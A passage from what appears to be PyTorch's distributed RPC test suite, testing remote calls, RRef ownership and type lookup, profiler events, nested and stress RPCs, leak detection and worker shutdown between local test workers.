)
@dist_init
def test_profiler_with_remote_udf(self):
self._run_test_profiler_with_remote_udf()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
self._run_test_profiler_with_remote_udf()
def _run_test_profiler_with_remote_builtin(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
use_record_function=True
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
torch.mul,
args=(torch.ones(1), torch.ones(1)),
dst=self.rank,
)
@dist_init
def test_profiler_with_remote_builtin(self):
self._run_test_profiler_with_remote_builtin()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
self._run_test_profiler_with_remote_builtin()
def _run_test_profiler_with_script_async_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.ASYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_async_rpc(self):
self._run_test_profiler_with_script_async_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
self._run_test_profiler_with_script_async_rpc()
def _run_test_profiler_with_script_sync_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.SYNC,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
@dist_init
def test_profiler_with_script_sync_rpc(self):
self._run_test_profiler_with_script_sync_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
self._run_test_profiler_with_script_sync_rpc()
def _run_test_profiler_with_script_remote_rpc(self):
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
)
self._profiler_test_with_rpc(
RPCExecMode.REMOTE,
my_script_func,
args=(torch.tensor(1),),
use_record_function=True,
)
# test remote to self
self._profiler_test_with_rpc(
RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
)
@dist_init
def test_profiler_with_script_remote_rpc(self):
self._run_test_profiler_with_script_remote_rpc()
@single_threaded_process_group_agent
@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events that happened on a thread.
last_end_time = 0
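# An event counts as top-level if it starts after every previously seen event
# on this thread has ended, i.e. it is not nested inside another event.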
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
self.assertEqual(sorted(top_level_event_names), sorted(expected_top_level_event_names))
@dist_init
def test_server_process_global_profiler(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker_name = worker_name(dst_rank)
x = torch.tensor(1)
y = torch.tensor(2)
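# The server-side profilers nest: the outer profile is entered first and sees
# both the add and the sub, while the inner one only sees the sub issued while
# it was active (verified via the top-level events below).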
outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
outer_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
inner_profile_rref.rpc_sync().__enter__()
rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
inner_profile_rref.rpc_sync().__exit__(None, None, None)
outer_profile_rref.rpc_sync().__exit__(None, None, None)
inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
self._assert_top_level_events(inner_events, ['aten::sub'])
outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
self._assert_top_level_events(outer_events, ['aten::add', 'aten::sub'])
inner_profile_rref.rpc_sync().key_averages()
outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
num_sleep_seconds = 1
if self.rank == 1:
# Validate that calling the function twice results in an error.
with torch.autograd.profiler.profile() as pf:
with torch.autograd.profiler.record_function("foo") as rf:
fut = rpc.rpc_async(
worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
)
rf._call_end_callbacks_on_future(fut)
with self.assertRaisesRegex(
RuntimeError, "can only be called once."
):
rf._call_end_callbacks_on_future(fut)
fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
if self.rank == 1:
with torch.autograd.profiler.profile() as pf:
key = _build_rpc_profiling_key(
RPCExecMode.ASYNC,
torch._jit_internal._qualified_name(my_script_func),
"worker1",
"worker0",
)
with torch.autograd.profiler.record_function(key) as rf:
fut = rpc.rpc_async(
worker_name(0), my_script_func, args=(torch.tensor(1),)
)
# Intentionally calling record_function internals
fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
result = fut.wait()
# Validate that the profiling future returns the same value as the RPC
# future.
expected = torch.add(torch.tensor(1), torch.tensor(1))
self.assertEqual(result, expected)
events = pf.function_events
rpc_event = get_function_event(
events, torch._jit_internal._qualified_name(my_script_func)
)
self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
self.assertEqual(ret.a, n)
@dist_init
def test_py_class_instance_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# the context manager before the remote function has run.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of the error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
nested_rpc,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(rref.to_here(), torch.ones(n, n) * 2)
@dist_init
def test_builtin_remote_self(self):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(torch.ones(2, 2), torch.ones(2, 2)),
)
self.assertEqual(rref.local_value(), torch.ones(2, 2) * 2)
def _test_multi_remote_call(self, fn, args_fn=lambda x: (), kwargs_fn=lambda x: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
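# n is bumped by i on every iteration so each remote call gets distinct
# arguments; expected collects the corresponding locally computed results.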
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n),
kwargs=kwargs_fn(n),
)
)
expected.append(fn(*args_fn(n), **kwargs_fn(n)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@dist_init
def test_multi_builtin_remote_ret(self):
def args_fn(n):
return (torch.ones(n, n), torch.ones(n, n))
self._test_multi_remote_call(torch.add, args_fn=args_fn)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@dist_init
def test_multi_py_udf_remote(self):
def kwargs_fn(n):
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
self._test_multi_remote_call(my_function, kwargs_fn=kwargs_fn)
@dist_init
def test_py_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rref_args_user_share(self):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rpc_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, torch.ones(n, n) + 4)
@dist_init
def test_nested_remote(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
nested_remote,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 3)
@dist_init
def test_nested_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_nested_rref_stress(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to run into
# timeout errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error is raised if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def test_rref_type(self):
def launched_rpc(events):
expected_name = "rpc_sync#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
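# The first _get_type() call has to ask the owner for the type, which shows up
# as an rpc_sync#_rref_typeof_on_owner event; later calls use the cached type
# and should launch no RPC, as the second profiling block verifies.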
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with torch.autograd.profiler.profile() as p:
t = rref._get_type()
self.assertTrue(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
with torch.autograd.profiler.profile() as p:
for _ in range(10):
t = rref._get_type()
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
self.assertEqual(rref._get_type(), MyClass)
@dist_init
def test_rref_type_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type()
@dist_init
def test_rref_type_owner(self):
rref = RRef(torch.ones(2) + 1)
self.assertEqual(rref._get_type(), type(torch.ones(2)))
rref = RRef(MyClass(0))
self.assertEqual(rref._get_type(), MyClass)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote object
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on the remote end.
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# Only test keys in this test case. Values should be covered by
# individual module debug info tests.
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up, for non ProcessGroupAgent backends.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
